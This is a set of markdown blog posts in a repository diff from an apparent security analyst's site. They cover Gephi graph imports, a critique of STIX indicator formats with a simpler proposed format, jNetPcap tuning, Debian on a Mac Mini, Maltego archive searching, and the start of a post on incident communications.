4. Go to File > Import Database
5. Add the Rexster configuration to ``/etc/graph/rexster.xml`` (if issues arise when importing the database, look at [5])

``rexster.xml`` should look like this:

    <graph>
      <graph-name>RexterGraph</graph-name>
      <graph-type>com.tinkerpop.rexster.config.RexsterGraphGraphConfiguration</graph-type>
      <graph-buffer-size>100</graph-buffer-size>
      <graph-location>http://192.168.109.128:8182/graphs/titan</graph-location>
    </graph>

You should be left with something like this in Gephi:

![A Rexster Graph import to Gephi, from a Titan database. The graph consists of a variety of segments, such as articles from an article system and imported Maltego graphs](/static/img/data/rexster-import-gephi.png)

Here's the cluster on the right, by the way. There are some interesting patterns inside it, so I suspect it's from a Maltego graph:

![](/static/img/data/gephi-cluster-maltego.png)

## Option 2: The Gephi Streaming API

For the other option I found the Gephi graph streaming API [6]. This one I currently find a little limited, in that it can only provide collaboration between two Gephi instances using a Jetty web server. It's pretty cool, but doesn't offer the integration I am looking for. I'll get back to this later.

[1] https://github.com/datablend/gephi-blueprints-plugin
[2] https://github.com/datablend/gephi-blueprints-plugin/wiki
[3] https://github.com/downloads/datablend/gephi-blueprints-plugin/org-gephi-lib-blueprints.nbm
[4] https://github.com/downloads/datablend/gephi-blueprints-plugin/org-gephi-blueprints-plugin.nbm
[5] https://github.com/datablend/gephi-blueprints-plugin/issues/1
[6] https://marketplace.gephi.org/plugin/graph-streaming/
data/indicators.md (new file, 463 lines)
@@ -0,0 +1,463 @@
Over what has become some years, cyber security professionals have been working on optimising the sharing of information and knowledge. A lot of the effort has recently been focused around intelligence- and data-driven teams. Today many of these discussions end up revolving around something related to the STIX format.

> Don't use a lot where a little will do
> – Unknown origin

This post offers a perspective on the potential of today's standard-oriented approach for documenting indicator sets related to cyber security threat actors and incidents. It turns out we have a longer way to go than expected.

For the purpose of this article, an indicator is a characteristic or evidence of something unwanted, or hostile if you'd like. I like to refer to the military term "Indicators & Warnings" in this regard. In other words, an indicator isn't necessarily limited to the cyber domain alone either. Physical security could be in an even worse condition than cyber security when it comes to expressing threat indicators. I'll leave the cross-domain discussion for another time.

## Up Until Today

Multiple standards have evolved and disappeared, and one that I have been in favour of previously is the OpenIOC 1.1 standard. However, times are changing, and so are the terminology and the breadth of how we are able to express intrusion sets.

Even though OpenIOC was a very good start, and still is as far as I am concerned, it has been far surpassed by Cybox and ultimately STIX [1] in popularity.

STIX is a container, a quite verbose XML format (which is turning into JSON in 2.0). Cybox is the artefact format [2], for malware you have MAEC [3], and so on. Basically it's a set of collaborating projects.

This all sounds good, right? Not quite. Have a look at the OpenIOC-to-STIX repository on GitHub [4] and you will find that ``stuxnet.stix.xml`` is 202 lines of XML code for 18 atomic indicators. OpenIOC, on the other hand, is 91 lines, and that is a verbose format as well. In fact the overhead ratio of the STIX file is about 10:1, while OpenIOC is about 5:1.

To add to the mind-blowing inefficiency, I have yet to see, on a regular basis, complex and nested expressions of an actor or a campaign in the STIX format.

Before you continue, do a simple Google search for "STIX editor" and "cybox editor". Do it now, and while you are at it google for "openioc editor" as well. Hello guys, these standards have been around for many years. So, how should we interpret the fact that there aren't any user-friendly approaches to using them? The closest I've come is through MISP, and that is generally speaking not using these standards for its internal workings either. This issue on the MISP GitHub tracker says it all: STIX 2.x support (MISP) [5].

I'm sure that some may disagree with the above statements, calling out the infancy of these formats. However, they can't be said to be new standards anymore. They are just too complex. One example is the graph-oriented relations implemented into the formats. Why not just let a graph database take care of those instead?

This is not just a post to establish the current state. How would a better approach look?

## What Is The Problem to Be Solved?

Back to where things have gone since the OpenIOC 1.1/atomic indicator days. The most promising addition, in my opinion, is the MITRE PRE-ATT&CK and ATT&CK frameworks. The two frameworks build on a less structured approach than seen for atomic indicators (Lockheed's Kill Chain). The latter can for instance be viewed in the form of the Intelligence Pyramid.

The Intelligence Pyramid's abstraction levels can be mapped against what they are supposed to support when it comes to indicators, like the following:
| Level of abstraction | Supports    |
|----------------------|-------------|
| Behavior             | Knowledge   |
| Derived              | Information |
| Atomic               | Data        |
The purpose of the abstraction layers is in this case to support assessments and measures at the corresponding contextual level. For instance, a technical report tailored to an Incident Response Team (IRT) generally concerns Derived and Atomic indicators, while an intelligence report would usually be based on the Behavioural level.

Having covered the abstraction layers, we can recognise that OpenIOC (or Cybox and MAEC) covers the bottom layers of abstraction, while MITRE (PRE-)ATT&CK in its current form is mostly about the Behaviour level.

For Derived indicators there are primarily two well-established, seasoned and successful formats that have become standards through their widespread usage. This is, among other things, because the indicators and rules are effective, rapid, easy and pleasing to write.

First we have Snort/Suricata rules and Lua scripts, which were designed for network detection. For Snort/Suricata I'd say that most of the metadata detected today is probably expressible in OpenIOC (except for the magic that can be done with Lua). Second, there is the Yara format, which has become known for its applicability against malicious files. The simplicity of both formats is obviously due to their power of expression. Thus, I'd say that the Yara and Snort/Suricata formats are the ones to look to when it comes to content and pattern detection.

> Indicators should be easy and pleasing to write.

To summarise the above, each of the formats can be mapped to an abstraction level:
| Level of abstraction | Formats            |
|----------------------|--------------------|
| Behavior             | MITRE (PRE-)ATT&CK |
| Derived              | Suricata+Lua, Yara |
| Atomic               | OpenIOC 1.1        |
Going through my notes on how I document my own indicators, I also found that I use the CVE database, datetimes, confidence, and analyst comments for context and classification as well (the latter being irrelevant for detection).

One of the major problems is that everything currently out there breaks the analyst workflow. You either need to log in to some fancy web interface, edit XML files (god forbid), or you just jot down everything in a text file. The text file seems to be the natural fallback in almost any instance. I have even attempted to use the very good initiative by Yahoo, PyIOCe, and Mandiant's long-forgotten IOC Editor. These projects have both lost traction, as has almost every other initiative in this space. So that is right folks, the text editor is still the preferred tool in 2018, and let's face it: indicators should be pleasing to design and create, like putting your signature to an incident or a job well done.

> an indicator set should be for humans and machines by humans

After all, the human is the one that is going to have to deal with the indicator sets at some point, and we are the slowest link. So let us not slow ourselves down more than necessary. At this point I would like to propose the golden rule of creating golden rules: an indicator set should be for humans and machines by humans.

You may also have noticed that when all these standards are suddenly combined into one standard, they become less user-friendly. In other words, let us rather find our way back to our common \*NIX roots, where each tool had a limited set of tasks.

Graphs are essential when writing indicators. Almost everything in the world around us can be modelled as a network, and infiltration and persistence in cyberspace is no exception. Thus, an indicator format needs to be representable in a graph, and guess what? Almost everything is, as long as it maintains some kind of structure.

For graphs there are two ways of going about the problem:

1) Implement the graph in the format

2) Make sure that you have a good graph backend and an automatable and traversable format available

For option 1, the graph in the format will increase the complexity significantly. Option 2 results in the opposite, but that does not mean that it can't be converted to a graph. To make an elaborate discussion short, this is what we have graph databases for, such as Janusgraph [6].

## A Conceptual View

Summarising the above, I'd like to propose the following requirements for indicator formats:

1) Indicator sets should be easy and inviting to create

2) You should be able to start writing at any time, when you need it

3) Unnecessary complexity should be avoided

4) The format should be human readable and editable

5) A machine should be able to interpret the format

6) Indicator sets should be graph compatible

With a basis in this article, I believe that the best approach is to provide a basic plain text format specification that inherits from the OpenIOC 1.1 and MITRE frameworks and references other formats where necessary.

Let us imagine that we found an IP address in one situation. The IP address was connected to a domain that we found using passive DNS. Further, it was found that a specific file was associated with that domain through a Twitter comment. Representing the given information in its purest (readable) form looks like the following:

    // a test file
    class tlp:white
    date 2018/02/18
    ipv4 low 188.226.130.166
    domain med secdiary.com
    technique PRE-T1146
    filename med some_filename.docx
    comment found in open sources

To recap some of the previous points: the above format is simple, and it can be written at any time based on knowledge of well-known standards. The best of it all is that if you are heavily invested in specific formats, it can be converted to them all using a simple interpreter traversing the format.
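To illustrate what such an interpreter might look like, here is a small sketch that reads the plain-text lines into the same (depth, type, confidence, value) tuples used in the pseudocode further down. The rule that two spaces of indentation equal one level of nesting is my own assumption; the format above does not specify it.

    LEVELS = ('low', 'med', 'high')

    def parse_indicators(lines):
        # turn the plain-text format into (depth, type, confidence, value) tuples
        # assumption: two spaces of indentation equal one level of nesting
        indicators = []
        for line in lines:
            stripped = line.strip()
            if not stripped or stripped.startswith('//'):
                continue
            depth = (len(line) - len(line.lstrip(' '))) // 2
            fields = stripped.split()
            if len(fields) >= 3 and fields[1] in LEVELS:
                indicators.append((depth, fields[0], fields[1], ' '.join(fields[2:])))
            else:
                indicators.append((depth, fields[0], None, ' '.join(fields[1:])))
        return indicators

    lines = ["class tlp:white",
             "ipv4 low 188.226.130.166",
             "  domain med secdiary.com"]
    # -> [(0, 'class', None, 'tlp:white'),
    #     (0, 'ipv4', 'low', '188.226.130.166'),
    #     (1, 'domain', 'med', 'secdiary.com')]
    print(parse_indicators(lines))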
Further, such a format is easily converted into a tree and can be loaded into a graph for traversal and automated assessments. Each confidence value can be quantified (``low=0.33``, ``med=0.66``, ``high=1.0``). That said, simplicity in this case equals actionable indicators.

    | v: 188.226.130.166 (0.33)    | match    |
    | e                            |          |
    | v: secdiary.com (0.66)       | no match | (0.33+0.66)/2=0.5
    | e                            |          |
    | v: some_filename.docx (0.66) | match    |

For networks vs hierarchies: a drawback of the latter, as mentioned in the former section, is the lack of support for e.g. multiple domains being connected to different other vertices. A practical solution goes as follows:

    ipv4 low 188.226.130.166
    domain med secdiary.com
    domain low secdiary.com
    ipv4 low 128.199.56.232

The graph receiving the above indicator file should identify the domain as being a unique entity and link the two IP addresses to the same domain:

    | v: 188.226.130.166 (0.33)
    | e: 0.5
    | v: secdiary.com (0.5)
    | e: 0.33
    | v: 128.199.56.232 (0.33)
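A rough sketch of that deduplication step, keeping one vertex per unique value and averaging the confidence when the same entity is seen again (the exact merge rule is an assumption on my part; the text only requires that the domain ends up as a single vertex):

    def load_into_graph(indicators):
        # indicators: (depth, type, confidence, value) tuples in file order,
        # quantified as low=0.33, med=0.66, high=1.0
        weights = {'low': 0.33, 'med': 0.66, 'high': 1.0}
        vertices = {}   # value -> confidence, one vertex per unique entity
        edges = []      # (previous value, value) pairs in file order
        previous = None
        for _, kind, confidence, value in indicators:
            score = weights.get(confidence, 0.0)
            if value in vertices:
                # same entity seen again: merge instead of creating a duplicate
                vertices[value] = (vertices[value] + score) / 2
            else:
                vertices[value] = score
            if previous is not None and previous != value:
                edges.append((previous, value))
            previous = value
        return vertices, edges

    sample = [(0, 'ipv4', 'low', '188.226.130.166'),
              (0, 'domain', 'med', 'secdiary.com'),
              (0, 'domain', 'low', 'secdiary.com'),
              (0, 'ipv4', 'low', '128.199.56.232')]
    vertices, edges = load_into_graph(sample)
    # secdiary.com collapses to one vertex with confidence (0.66+0.33)/2, roughly 0.5
    print(vertices)
    print(edges)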
As for structuring the indicator format for machines in practical terms, consider the following pseudocode:

    indicators = [(0,'ipv4','low','188.226.130.166'),...]
    _tree = tree(root_node)
    for indicator in indicators:
        depth = indicator[0]
        _tree.insert(indicator, depth)

Now that we have the tree represented in code, it is trivially traversable when loading it into some graph:

    method load_indicators(node, depth):
        graph.insert(node.parent, edge_label, node)
        for child in node.children:
            load_indicators(child, depth+1)

    load_indicators(tree, 0)
## Summary

Hopefully I did not kill too many kittens with this post. You may or may not agree, but I do believe that most analysts share at least parts of my purist views on the matter.

We are currently too focused on supporting standards and having everyone use as few of them as possible. I believe that energy is better spent on getting more consistent in the way we document, and on actually exchanging more developed indicator sets than the md5 hash and domain lists that are typically shared today ("not looking at these kinds of files at all", even though it's not the worst I've seen: ``MAR-10135536-F_WHITE_stix.xml`` [7]).

In the conceptual part of this article I propose a simple but effective way of representing indicators in a practical manner. Frankly, it is even too simple to be novel. It is just consistent and intuitive.

PS! For the STIX example above, have a look at the following to get a feel for the actual content of the file (I used one of the mentioned specimens to show the point):

    class tlp:white
    date 2018/02/05

    sha1 high 4efb9c09d7bffb2f64fc6fe2519ea85378756195
    comment NCCIC:Observable-724f9bfe-1392-456e-8d9b-c143af15f8d4
    comment did not convert all attributes
    compiler Microsoft Visual C++ 6.0
    md5 high 3dae0dc356c2b217a452b477c4b1db06
    date 2016-01-29T09:21:46Z
    entropy med 6.65226708818
    #sections low 5
    intname med ProxyDll.dll
    detection med symantec:Heur.AdvML.B
The original document needs no less than 119 lines for those
same indicators, an overhead ratio of about 1:5 (and it
looks completely insane):

    <stix:Observables cybox_major_version="2" cybox_minor_version="1" cybox_update_version="0">
    <cybox:Observable id="NCCIC:Observable-724f9bfe-1392-456e-8d9b-c143af15f8d4">
    <cybox:Object id="NCCIC:WinExecutableFile-bb9e38d1-d91c-4727-ab6a-514ecc0c02a2">
    <cybox:Properties xsi:type="WinExecutableFileObj:WindowsExecutableFileObjectType">
    <FileObj:File_Name>3DAE0DC356C2B217A452B477C4B1DB06</FileObj:File_Name>
    <FileObj:Size_In_Bytes>336073</FileObj:Size_In_Bytes>
    <FileObj:File_Format>PE32 executable (DLL) (console) Intel 80386, for MS Windows</FileObj:File_Format>
    <FileObj:Hashes>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>3dae0dc356c2b217a452b477c4b1db06</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SHA1</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>4efb9c09d7bffb2f64fc6fe2519ea85378756195</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SHA256</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>8acfe8ba294ebb81402f37aa094cca8f914792b9171bc62e758a3bbefafb6e02</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SHA512</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>e52b8878bd8c3bdd28d696470cba8a18dcc5a6d234169e26a2fbd9862b10ec1d40196fac981bc3c5a67e661cd60c10036321388e5e5c1f60a7e9937dd71fadb1</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">SSDEEP</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>3072:jUdidTaC07zIQt9xSx1pYxHvQY06emquSYttxlxep0xnC:jyi1XCzcbpYdvQ2e9g3kp01C</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    </FileObj:Hashes>
    <FileObj:Packer_List>
    <FileObj:Packer>
    <FileObj:Name>Microsoft Visual C++ 6.0</FileObj:Name>
    </FileObj:Packer>
    <FileObj:Packer>
    <FileObj:Name>Microsoft Visual C++ 6.0 DLL (Debug)</FileObj:Name>
    </FileObj:Packer>
    </FileObj:Packer_List>
    <FileObj:Peak_Entropy>6.65226708818</FileObj:Peak_Entropy>
    <WinExecutableFileObj:Headers>
    <WinExecutableFileObj:File_Header>
    <WinExecutableFileObj:Number_Of_Sections>5</WinExecutableFileObj:Number_Of_Sections>
    <WinExecutableFileObj:Time_Date_Stamp>2016-01-29T09:21:46Z</WinExecutableFileObj:Time_Date_Stamp>
    <WinExecutableFileObj:Size_Of_Optional_Header>4096</WinExecutableFileObj:Size_Of_Optional_Header>
    <WinExecutableFileObj:Hashes>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>e14dca360e273ca75c52a4446cd39897</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    </WinExecutableFileObj:Hashes>
    </WinExecutableFileObj:File_Header>
    <WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Value>0.672591739631</WinExecutableFileObj:Value>
    </WinExecutableFileObj:Entropy>
    </WinExecutableFileObj:Headers>
    <WinExecutableFileObj:Sections>
    <WinExecutableFileObj:Section>
    <WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Name>.text</WinExecutableFileObj:Name>
    <WinExecutableFileObj:Size_Of_Raw_Data>49152</WinExecutableFileObj:Size_Of_Raw_Data>
    </WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Value>6.41338619924</WinExecutableFileObj:Value>
    </WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Header_Hashes>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>076cdf2a2c0b721f0259de10578505a1</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    </WinExecutableFileObj:Header_Hashes>
    </WinExecutableFileObj:Section>
    <WinExecutableFileObj:Section>
    <WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Name>.rdata</WinExecutableFileObj:Name>
    <WinExecutableFileObj:Size_Of_Raw_Data>8192</WinExecutableFileObj:Size_Of_Raw_Data>
    </WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Value>3.293891672</WinExecutableFileObj:Value>
    </WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Header_Hashes>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>4a6af2b49d08dd42374deda5564c24ef</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    </WinExecutableFileObj:Header_Hashes>
    </WinExecutableFileObj:Section>
    <WinExecutableFileObj:Section>
    <WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Name>.data</WinExecutableFileObj:Name>
    <WinExecutableFileObj:Size_Of_Raw_Data>110592</WinExecutableFileObj:Size_Of_Raw_Data>
    </WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Value>6.78785911234</WinExecutableFileObj:Value>
    </WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Header_Hashes>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>c797dda9277ee1d5469683527955d77a</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    </WinExecutableFileObj:Header_Hashes>
    </WinExecutableFileObj:Section>
    <WinExecutableFileObj:Section>
    <WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Name>.reloc</WinExecutableFileObj:Name>
    <WinExecutableFileObj:Size_Of_Raw_Data>8192</WinExecutableFileObj:Size_Of_Raw_Data>
    </WinExecutableFileObj:Section_Header>
    <WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Value>3.46819043887</WinExecutableFileObj:Value>
    </WinExecutableFileObj:Entropy>
    <WinExecutableFileObj:Header_Hashes>
    <cyboxCommon:Hash>
    <cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
    <cyboxCommon:Simple_Hash_Value>fbefbe53b3d0ca62b2134f249d249774</cyboxCommon:Simple_Hash_Value>
    </cyboxCommon:Hash>
    </WinExecutableFileObj:Header_Hashes>
    </WinExecutableFileObj:Section>
    </WinExecutableFileObj:Sections>
    </cybox:Properties>
    </cybox:Object>
    </cybox:Observable>

[1] STIX: https://oasis-open.github.io/cti-documentation/
[2] Cybox example: https://github.com/CybOXProject/schemas/blob/master/samples/CybOX_IPv4Address_Instance.xml
[3] MAEC: https://maec.mitre.org/
[4] OpenIOC to STIX repository on Github: https://github.com/STIXProject/openioc-to-stix
[5] STIX 2.x support (MISP): https://github.com/MISP/MISP/issues/2046
[6] Janusgraph: http://janusgraph.org/
[7] MAR-10135536-F_WHITE_stix.xml: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F_WHITE_stix.xml

84
data/jnetpcap-tuning.md
Normal file

@@ -0,0 +1,84 @@

There comes a time in programming when one has to start
paying attention to performance. While this is true in many
cases, there are two places where it is especially
important: parallel processing and packet captures. Even
more so if doing both at once. In this article we'll keep
the latter in mind together with jNetPcap, a Java wrapper
for libpcap able to do 60Kpps per instance.

First of all I found an excellent post on performance tuning
jNetPcap. There's also a good implementation example for
moving to the much faster ``JBufferHandler`` [1].

One should take note of the ring buffer, that is, how much
memory you have for temporarily storing packets if there's a
lot of traffic. Usually this may be e.g. 453k, while the
maximum can be 4M (for instance 4078 as it was in my
case). For tuning this on RedHat one may use ``ethtool -g
eth0``, and adjust it with ``ethtool -G eth0 rx
4078``. Larger buffers result in higher throughput, but also
higher latency (which is not that important when doing
packet captures). More on ethtool and ring buffer
adjustments here.

When it comes to jNetPcap, the following is an example
implementing it as an Apache Flume source [2]:

    @Override
    public void start() {
        final ChannelProcessor channel = getChannelProcessor();

        // JBufferHandler hands the packet over as a reusable buffer
        // reference instead of copying it up front.
        JBufferHandler<ChannelProcessor> jpacketHandler = new JBufferHandler<ChannelProcessor>() {

            public void nextPacket(PcapHeader pcapHeader, JBuffer packet, ChannelProcessor channelProcessor) {
                int size = packet.size();
                JBuffer buffer = packet;
                byte[] packetBytes = buffer.getByteArray(0, size);

                // Wrap the raw packet bytes in a Flume event and pass it on.
                Event flumeEvent = EventBuilder.withBody(packetBytes);
                channel.processEvent(flumeEvent);
            }
        };

        super.start();
        pcap.loop(-1, jpacketHandler, channel);
    }

The above shows you a slightly different version than the
most well-documented example (``PcapHandler``) [3]. You
should choose the above one since it is much faster due to
the packet referencing. I tested it on one site, and packet
loss on the software side of things improved drastically.

Last but not least, in order to do software-side performance
monitoring, you might want to add a handler to capture
statistics in jNetPcap. This is mentioned in the jNetPcap
forums as well [4]:

> You can also use PcapStat to see if libpcap is dropping any
> packets. If the buffer becomes full and libpcap can't store a
> packet, it will record it in statistics. This is different from
> the NIC dropping packets.

This may be implemented in the configuration as shown here:

    PcapStat stats = new PcapStat();
    pcap = Pcap.openLive(device.getName(), SNAPLEN, Pcap.MODE_PROMISCUOUS, timeout, errbuf);
    pcap.stats(stats);

You can get the stats with the following:

    System.out.printf("drop=%d, ifDrop=%d\n", stats.getDrop(), stats.getIfDrop());

Hope this gets you up and running smoothly; tuning packet
captures in combination with parallel computing is a
challenge.

To get some more context you may also like to have a look at
the presentation that Cisco did on OpenSOC - that's how to
do it.

[1] http://jnetpcap.com/node/67
[2] http://flume.apache.org/
[3] http://jnetpcap.com/examples/dumper
[4] http://jnetpcap.com/node/704

173
data/mac-mini-debian.md
Normal file

@@ -0,0 +1,173 @@

There are a lot of guides on booting Linux on a Mac Mini,
and the Mac Mini is absolutely great. There are also a lot
of guides which take some unnecessary steps on the way from
the native OS X experience to a bloated and
difficult-to-set-up Linux installation. Some of them are
good on certain points though.

So, not surprisingly, I will tell you how to make it work
with both a native EFI installation and the Broadcom BCM4366
up and running.

Everything will be done on the command line, so this will
work great on servers as well. Of course you won't run wifi
on the work server though (!).

First, take note that this will wipe almost everything Apple
from your box except the firmware. You may roll back by
pressing the ALT-key while booting.

Second, you should use Debian 8.0 "Jessie" (which is
currently in RC1). This is important since Wheezy doesn't
support the Broadcom chipset.

Prerequisites for this article are:

* A Mac Mini, tested on an OCT 2014 model
* A keyboard
* A USB memory stick of at least 2GB (speed is the key)

## 1. Install Debian - and Change Boot Order

You should create a bootable USB stick for your Debian
installation. When you've downloaded the ISO, you can make
it bootable without hassle through Unetbootin [1]. That one
works on OS X 10.10 "Yosemite" as well.

When you've got that one ready, insert it into the Mini,
holding the ALT-key while booting. You will get to the boot
menu; choose the "EFI" one. This will initiate GRUB from the
stick.

Do the installation as you would on any other machine. Since
your mac is still set up to boot to OS X, we need to change
that next in order to make it point to the Debian
installation instead.

When rebooting, get into the boot menu by holding the
ALT-key again. Select that same GRUB menu again, _BUT_
instead of choosing to install it you should now press "c"
to get to the GRUB command line.

It is now time to locate the boot directory [2] on the right
disk. Vary X (disk) and Y (partition) until you find the
right combination:

    grub> ls (hdX,gptY)/boot/grub

That may for instance result in:

    grub> ls (hd2,gpt2)/boot/grub

Set the ``root`` to that disk and partition, and boot it:

    grub> set root=(hd2,gpt2)
    grub> ls -l (hd2,gpt2)
    grub> linux /boot/vmlinux[...].efi.signed root=UUID=[uuid from above command]
    grub> initrd /boot/initrd[...]
    grub> boot

You will now boot to the one you just installed. It is time
to make it persistent and change the boot order with
``efibootmgr``. First list your current settings by:

    sudo efibootmgr

Now change the boot order (may vary, the point being that
Debian should come first):

    sudo efibootmgr -o 0,1

Now reboot and enjoy the darkness without wifi.

## 2. Get Wifi Up and Running (Offline)

The current Broadcom chipset is quite new, so you'll need to
step it up to Debian "Jessie" to get it working. Cutting
this a bit short, you will probably need to do this part
offline. Using a small trick you can get all those
dependencies on a VMware installation (run the same image as
the one you installed, and remember to simulate that you
don't have network on that virtual installation):

    apt-get -qq --print-uris install build-essential linux-headers-$(uname -r) broadcom-sta-dkms patch bzip2 wpasupplicant | cut -d\' -f 2 > urls.txt

This will produce a file of URLs for all the requested
packages and their dependencies. Get the stick, format it
with FAT - and grab the packages onto it:

    wget -i urls.txt

Unmounting that from the virtual installation, insert it
into the physical installation:

    cd /mnt/usb
    dpkg -i *.deb

Remove all modules that may conflict (and blacklist them in
``/etc/modprobe.d/blacklist.config``):

    modprobe -r b44 b43 b43legacy ssb brcmsmac

Load the Broadcom module:

    modprobe wl
    echo wl >> /etc/modules

Everything that's left now is configuring and starting
wpa_supplicant:

    wpa_passphrase <ssid> [passphrase] > /etc/wpa_supplicant.conf
    wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant.conf

To make it persistent, enable the interface in
``/etc/network/interfaces`` by appending:

    auto wlan0
    iface wlan0 inet dhcp
    wpa-conf /etc/wpa_supplicant.conf

If you have made an exception in your DHCP pool, you should
also make it static (basic stuff, but anyway):

    auto wlan0
    iface wlan0 inet static
    wpa-conf /etc/wpa_supplicant.conf
    address 192.168.1.2
    netmask 255.255.255.0
    gateway 192.168.1.1

That's basically it. Enjoy the show!

**Edit 1, FEB 7th 2015:** So I got to play with ``systemd``,
since it turns out a service isn't a service the way it used
to be. In order to start services in Debian "Jessie", you'll
need to use ``systemd``. Here's an example for ``znc`` [3]:

    [Unit]
    Description=An advanced IRC bouncer
    After=network.target oidentd.socket

    [Service]
    Type=simple
    EnvironmentFile=/etc/conf.d/znc
    User=znc
    ExecStart=/usr/bin/znc -f $ZNC_OPTIONS
    ExecReload=/bin/kill -HUP $MAINPID

    [Install]
    WantedBy=multi-user.target

Also create the directory and drop the following line into
``/etc/conf.d/znc``: ``ZNC_OPTIONS="-d /var/lib/znc"``

**Edit 2, FEB 7th 2015:** To enable the Mac Mini to
auto-restart after power failure, set the following PCI
value [4]:

    setpci -s 0:1f.0 0xa4.b=0

[1] http://unetbootin.sourceforge.net/
[2] http://askubuntu.com/questions/516535/how-can-i-use-the-installer-to-manually-boot-into-a-system-without-grub-installer
[3] https://gist.github.com/tlercher/3897561
[4] http://smackerelofopinion.blogspot.no/2011/09/mac-mini-rebooting-tweaks-setpci-s-01f0.html

52
data/maltego-search.md
Normal file

@@ -0,0 +1,52 @@

I've previously been writing on how to read and process
Maltego mtgx graph archives. When you start to get a
directory with a lot of them you will probably be like me:
"Where did I see this thing again?"

The solution can of course be done in Python like in my
previous post, but let's try a more native solution this
time, zipgrep:

> zipgrep will search files within a ZIP archive for lines
> matching the given string or pattern. zipgrep is a shell script
> and requires egrep(1) and unzip(1L) to function. Its output is
> identical to that of egrep(1).

In my testing I had 20 files, and everything worked pretty
well in regard to searching the files by e.g. ``zipgrep
1.2.3.4 \*.mtgx \*.graphml``. The problem here is that
zipgrep doesn't seem to support printing the archive names,
so thank you for that. Returning to the more basic zip
tools, a zip cat (``unzip -c``) was the solution in my case:

    unzip -c \*.mtgx 2>&1 |egrep "(Archive: )|1.2.3.4"

    Archive: 1.mtgx
    Archive: 2.mtgx
    Archive: 3.mtgx
    Archive: 4.mtgx
    Archive: 5.mtgx
    Archive: 6.mtgx
    Archive: 7.mtgx
    Archive: 8.mtgx
    Archive: 9.mtgx
    Archive: 10.mtgx
    Archive: 11.mtgx
    Archive: 12.mtgx
    Archive: 13.mtgx
    Archive: 14.mtgx
    Archive: 15.mtgx
    Archive: 16.mtgx
    1.2.3.4
    Archive: 17.mtgx
    1.2.3.4
    Archive: 18.mtgx
    Archive: 19.mtgx
    Archive: 20.mtgx

A little Maltego archive insight helps us speed up the
query, since the graphml file will always stay at
``Graphs/Graph1.graphml``:

    unzip -c \*.mtgx Graphs/Graph1.graphml 2>&1 |egrep "(Archive: )|1.2.3.4"

The latter gives the same results as shown above.
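
For completeness, the Python route referred to above could
look roughly like the following; a minimal sketch using only
the standard library (the search string is just an example):

    # Minimal sketch: search Graphs/Graph1.graphml in every mtgx
    # archive in the current directory and print matching archives.
    import glob
    import zipfile

    needle = b"1.2.3.4"

    for path in glob.glob("*.mtgx"):
        with zipfile.ZipFile(path) as archive:
            if needle in archive.read("Graphs/Graph1.graphml"):
                print("Archive:", path)
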

199
data/matrix.md
Normal file

@@ -0,0 +1,199 @@

We have all been there during security operations. One of
the parties involved in an incident or daily routine is not
prepared for the thought that they could be compromised.

Communications and information sharing are among the
fundamental things that you need to get right during a
crisis.

As now-retired FBI director James Comey put it to 60 Minutes
[1]:

> There are two kinds of big companies in the United States. There
> are those who've been hacked by the Chinese and those who don't
> know they've been hacked by the Chinese.

The following question always arises: How do we maintain
operational security while still being able to communicate
with all parties involved?

In practical terms this requires a communications platform
to:

* Be independent of the service infrastructure
* Provide traceability
* Be resistant to resourceful threat actors
* Have simple and secure identity management
* Have cross-platform compatibility
* Provide file-sharing capabilities and the ability to give
  the user an opportunity to express himself
* Support video and audio exchanges
* Be under the control of the team using it (the smallest
  circle of trust)
* Provide both end-to-end and transport layer encryption
